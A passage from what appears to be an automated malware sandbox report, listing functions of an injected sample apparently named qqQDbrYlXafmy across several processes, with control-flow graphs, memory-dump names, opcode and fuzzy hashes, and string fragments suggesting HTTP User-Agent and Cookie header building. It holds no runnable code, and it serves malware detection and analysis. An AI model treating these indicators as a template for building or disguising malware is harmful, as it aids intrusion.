                                                                                                                                                                                          control_flow_graph 57 1451345-1451352 58 1451358-145135e 57->58 59 14513eb-14513ec 57->59 58->59 60 1451364-145137a 58->60 60->59 62 145137c-145138f 60->62 64 1451391-1451398 62->64 65 145139b-14513ab call 1450e7c 64->65 68 14513ad-14513e2 65->68 68->59
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000029.00000002.2913042564.0000000001450000.00000040.00000001.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_41_2_1450000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                                          • Instruction ID: 28ef556e5b0b4e396fd6580e3d33d480efc1ab3297ce517190c884814b5dcf67
                                                                                                                                                                                          • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D219031904216AFEB119F78C884B5DBFB5AF04710F154216FE55BB6A6D770E810CB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 014514DE Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 69 14514de-1451590 call 1453653 call 1450c9c call 1451345 * 6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000029.00000002.2913042564.0000000001450000.00000040.00000001.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_41_2_1450000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: dd4bdbd2d3ac98c154407d02b891d2f62a68255919f7b6f6d8897c53184077a6
                                                                                                                                                                                          • Instruction ID: 8ea9f74e74ec5545e2bc3b3c37fb6e2c5b015d37981f73cc56da6a5f9edf9629
                                                                                                                                                                                          • Opcode Fuzzy Hash: dd4bdbd2d3ac98c154407d02b891d2f62a68255919f7b6f6d8897c53184077a6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E1119724046149EEF43AF60C5C8CAA73ECEE50A04B4509AF9D89EF04AFFB09154CAE5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 01453F0D Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 87 1453f0d-1453f29 call 1453653 call 145379f 92 1453f3b-1453f66 call 1453f78 * 3 87->92 93 1453f2b-1453f39 call 145401b 87->93 106 1453f71 92->106 100 1453f76-1453f77 93->100 106->100 107 1453f71 call 1453f78 106->107 107->100
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000029.00000002.2913042564.0000000001450000.00000040.00000001.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_41_2_1450000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                                          • Instruction ID: 6e2ae39abecfc5bd3c14e309ea4f453323a3400e44427bb894d381aa4d7aa458
                                                                                                                                                                                          • Opcode Fuzzy Hash: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                                          • Instruction Fuzzy Hash: FAF08272588241A6FF813FB19C5960936B47F70785F04009AAEC9AD0F2DE3055508E70
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Function 01454675 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 133 1454675-145468d call 1453a1c 136 145469d-14546cd 133->136 137 145468f-1454698 call 1453a6e 133->137 140 14547e7-14547ec 136->140 141 14546d3-14546f5 136->141 137->136 141->140 143 14546fb-1454720 141->143 145 1454722-1454737 143->145 146 1454738-145475a 143->146 145->146 148 145475c-145477e 146->148 149 14547bf-14547c9 146->149 148->149 154 1454780-14547a2 148->154 150 14547e0-14547e5 149->150 151 14547cb-14547dd call 1453673 149->151 150->140 151->150 154->149 157 14547a4-14547bc 154->157 157->149
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000029.00000002.2913042564.0000000001450000.00000040.00000001.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_41_2_1450000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                                          • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                                          • Instruction ID: eaa47e726d27a5623d1dc96f413d721acfcf76ffb1abe7c6b36afa36a965c373
                                                                                                                                                                                          • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                                          • Instruction Fuzzy Hash: 514172B6500208BFEF125FA9CC48BDEBFB9FF80744F154069EA44AA255E734D690CB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 01454674 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 108 1454674-1454680 109 145468b-145468d 108->109 110 1454686 call 1453a1c 108->110 111 145469d-14546cd 109->111 112 145468f-1454698 call 1453a6e 109->112 110->109 115 14547e7-14547ec 111->115 116 14546d3-14546f5 111->116 112->111 116->115 118 14546fb-1454720 116->118 120 1454722-1454737 118->120 121 1454738-145475a 118->121 120->121 123 145475c-145477e 121->123 124 14547bf-14547c9 121->124 123->124 129 1454780-14547a2 123->129 125 14547e0-14547e5 124->125 126 14547cb-14547dd call 1453673 124->126 125->115 126->125 129->124 132 14547a4-14547bc 129->132 132->124
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000029.00000002.2913042564.0000000001450000.00000040.00000001.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_41_2_1450000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                                          • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                                          • Instruction ID: 9e6816cd8eddef315fcdaec5945646d9de88ab1c922627bf52c489c77d46535c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                                          • Instruction Fuzzy Hash: D24185B6500208BFEF129FA5CC44BEEBFB9FF80744F154069EA44AA255D734D690CB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 0262093E Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 0 262093e-262095f call 2620cc4 call 26214bc call 2623cc0 8 2620967-2620989 0->8 10 2620af1-2620af2 8->10 11 262098f-26209d2 call 26209d9 8->11 15 26209d4-26209d5 11->15 16 2620a3d-2620a80 11->16 17 26209d7-26209e8 call 2623653 15->17 18 2620a3c 15->18 21 2620a82-2620aae 16->21 22 2620aec call 2620af3 16->22 17->22 29 26209ee-2620a10 17->29 18->16 21->22 27 2620ab0-2620abc 21->27 22->10 31 2620ac1-2620ae5 27->31 29->22 33 2620a16-2620a3b 29->33 31->10 37 2620ae7-2620aea 31->37 33->18 33->22 37->22 37->31
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000002A.00000002.2919073172.0000000002620000.00000040.00000001.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_42_2_2620000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                                          • Instruction ID: 36843993a34071c36a95438efac339e6c0b747574a383a4d0107ca741889c638
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                                          • Instruction Fuzzy Hash: E051C0316442649FEB239F20CC84B9A37BCAF04744F4401D9BA49FE0D6DBB09694CF69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 026214BC Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 38 26214bc-2621590 call 26214de call 2620c9c call 2621345 * 6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000002A.00000002.2919073172.0000000002620000.00000040.00000001.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_42_2_2620000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
                                                                                                                                                                                          • Instruction ID: 85a25ab8c439bcf41c71c95de6a7f0432f61dd859ed9c794b2d1b669e1c63715
                                                                                                                                                                                          • Opcode Fuzzy Hash: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A210372404A249EDF03AF60C9C8CA673EDEF40704F4505AA9D89EF049FA709158CEE9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02621345 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 57 2621345-2621352 58 26213eb-26213ec 57->58 59 2621358-262135e 57->59 59->58 60 2621364-262137a 59->60 60->58 62 262137c-262138f 60->62 64 2621391-2621398 62->64 65 262139b-26213ab call 2620e7c 64->65 68 26213ad-26213e2 65->68 68->58
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000002A.00000002.2919073172.0000000002620000.00000040.00000001.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_42_2_2620000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                                          • Instruction ID: 45a9de386e907e368012b3462271b9e95afc4a8789193f67b9d0643b7f6fc56c
                                                                                                                                                                                          • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                                          • Instruction Fuzzy Hash: E421AE31904226AFEF219E78C944B9DBBB6AF05300F058255F959BB695DB30A904CB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 026214DE Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 69 26214de-2621590 call 2623653 call 2620c9c call 2621345 * 6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000002A.00000002.2919073172.0000000002620000.00000040.00000001.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_42_2_2620000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
                                                                                                                                                                                          • Instruction ID: 3f8643b4fea238a52d51d606d901979c36363c308cf9ccdb725598d14410af8f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 171182724049249EDF03AF60C5C8CA673EDEF40704B4509AE9D89EF449FE719158CEE9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02623F0D Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 87 2623f0d-2623f29 call 2623653 call 262379f 92 2623f3b-2623f66 call 2623f78 * 3 87->92 93 2623f2b-2623f39 call 262401b 87->93 106 2623f71 92->106 101 2623f76-2623f77 93->101 106->101 107 2623f71 call 2623f78 106->107 107->101
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000002A.00000002.2919073172.0000000002620000.00000040.00000001.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_42_2_2620000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 8c09feb9db596d8359f295e8d139cc18023a08d38d10f5a63b4ad8fb083c8443
                                                                                                                                                                                          • Instruction ID: a2d0bc20bcff1afa7cecb09308dcf8f468c98985e5b0defe1d41980f0e626800
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c09feb9db596d8359f295e8d139cc18023a08d38d10f5a63b4ad8fb083c8443
                                                                                                                                                                                          • Instruction Fuzzy Hash: 70F0A7305886A0A7FF007F70AC4975D32B95F00305F0400D4E949BD2D0CF3885788E79
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Function 02624674 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 108 2624674-262468d call 2623a1c 111 262468f-2624698 call 2623a6e 108->111 112 262469d-26246cd 108->112 111->112 115 26246d3-26246f5 112->115 116 26247e7-26247ec 112->116 115->116 118 26246fb-2624720 115->118 120 2624722-2624737 118->120 121 2624738-262475a 118->121 120->121 123 26247bf-26247c9 121->123 124 262475c-262477e 121->124 125 26247e0-26247e5 123->125 126 26247cb-26247dd call 2623673 123->126 124->123 129 2624780-26247a2 124->129 125->116 126->125 129->123 132 26247a4-26247bc 129->132 132->123
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000002A.00000002.2919073172.0000000002620000.00000040.00000001.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_42_2_2620000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                                          • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                                          • Instruction ID: 93c96e7adf28cd558c46a1101ca51478e7f72e507a8b0d133227b1d30ddd0ae3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 624193B6600618BFEF129F64CC84BDEBFBAEF80704F154069EA44AA254DB34D644CF94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02624675 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 133 2624675-2624680 134 262468b-262468d 133->134 135 2624686 call 2623a1c 133->135 136 262468f-2624698 call 2623a6e 134->136 137 262469d-26246cd 134->137 135->134 136->137 140 26246d3-26246f5 137->140 141 26247e7-26247ec 137->141 140->141 143 26246fb-2624720 140->143 145 2624722-2624737 143->145 146 2624738-262475a 143->146 145->146 148 26247bf-26247c9 146->148 149 262475c-262477e 146->149 150 26247e0-26247e5 148->150 151 26247cb-26247dd call 2623673 148->151 149->148 154 2624780-26247a2 149->154 150->141 151->150 154->148 157 26247a4-26247bc 154->157 157->148
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000002A.00000002.2919073172.0000000002620000.00000040.00000001.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_42_2_2620000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                                          • API String ID: 0-2052191038
                                                                                                                                                                                          • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                                          • Instruction ID: 05e6525e032cf75ec52e11297d9a8d63066c71a5b4cf809cc2a330e54ce585bf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C41C3B6600618BFEF125F64CC48BDEBFBAEF80704F144068EA44AA254DB30D644CF94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 00EE093E Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 0 ee093e-ee095f call ee0cc4 call ee14bc call ee3cc0 8 ee0967-ee0989 0->8 10 ee098f-ee09d2 call ee09d9 8->10 11 ee0af1-ee0af2 8->11 15 ee0a3d-ee0a76 10->15 16 ee09d4-ee09d5 10->16 17 ee0a7e-ee0a80 15->17 18 ee0a3c 16->18 19 ee09d7-ee09e8 call ee3653 16->19 21 ee0aec call ee0af3 17->21 22 ee0a82-ee0aae 17->22 18->15 19->21 30 ee09ee-ee0a10 19->30 21->11 22->21 27 ee0ab0-ee0abc 22->27 31 ee0ac1-ee0ae5 27->31 30->21 34 ee0a16-ee0a3b 30->34 31->11 37 ee0ae7-ee0aea 31->37 34->21 38 ee0a41-ee0a76 34->38 37->21 37->31 38->17
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000002B.00000002.2911884280.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_43_2_ee0000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                                          • Instruction ID: 3b883074fb3a4a4efb01e8a830865175f728be6058f19d636006667d61ccd0f9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                                          • Instruction Fuzzy Hash: C05192315443989FEF139F61CC85B9977B8EF04744F0401E9BA49FE0D6DAB09A90CA65
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00EE14BC Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 39 ee14bc-ee1590 call ee14de call ee0c9c call ee1345 * 6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000002B.00000002.2911884280.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_43_2_ee0000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
                                                                                                                                                                                          • Instruction ID: 8feeca0cfe8628997307a84226603dfcaecb69221f2341d4ddaf02f148b22a89
                                                                                                                                                                                          • Opcode Fuzzy Hash: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
                                                                                                                                                                                          • Instruction Fuzzy Hash: CD2124724046589EDF03AF60C9C9CA773ECEF40704F4505AAAD85EF049FE709194CAE6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00EE1345 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 58 ee1345-ee1352 59 ee13eb-ee13ec 58->59 60 ee1358-ee135e 58->60 60->59 61 ee1364-ee137a 60->61 61->59 63 ee137c-ee138f 61->63 65 ee1391-ee1398 63->65 66 ee139b-ee13ab call ee0e7c 65->66 69 ee13ad-ee13e2 66->69 69->59
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000002B.00000002.2911884280.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_43_2_ee0000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                                          • Instruction ID: 9d4556ed828c95edfebf30ce3b97810a9faa26ecc294f1ae4b1dc6313f54dbe1
                                                                                                                                                                                          • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                                          • Instruction Fuzzy Hash: F921C03190425AAFDB119FB9C845B5DBBB5AF04300F054265FD55BB594D770E800CB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00EE14DE Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 70 ee14de-ee1590 call ee3653 call ee0c9c call ee1345 * 6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000002B.00000002.2911884280.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_43_2_ee0000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
                                                                                                                                                                                          • Instruction ID: cad74ae53a12959c0d32a88463ac8be05740e48b0529743181896a59c1eefe72
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1511D3724045589EEF03AF70C5C9CAA73ECEF40704B450AAAAD85EF44EFE709194CAE5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00EE3F0D Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 88 ee3f0d-ee3f29 call ee3653 call ee379f 93 ee3f3b-ee3f66 call ee3f78 * 3 88->93 94 ee3f2b-ee3f39 call ee401b 88->94 107 ee3f71 93->107 102 ee3f76-ee3f77 94->102 107->102 108 ee3f71 call ee3f78 107->108 108->102
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000002B.00000002.2911884280.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_43_2_ee0000_qqQDbrYlXafmy.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 8c09feb9db596d8359f295e8d139cc18023a08d38d10f5a63b4ad8fb083c8443
                                                                                                                                                                                          • Instruction ID: 2a8619193d0bbb21e4aa219fef2aefff59917c7269267b82a73d9add1b1c3c06
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c09feb9db596d8359f295e8d139cc18023a08d38d10f5a63b4ad8fb083c8443
                                                                                                                                                                                          • Instruction Fuzzy Hash: C2F01270A982C8A6EF403B728C4F69936F45F40705F042591BA49BF0D6DE708650DE75
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Function 00EE4674 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
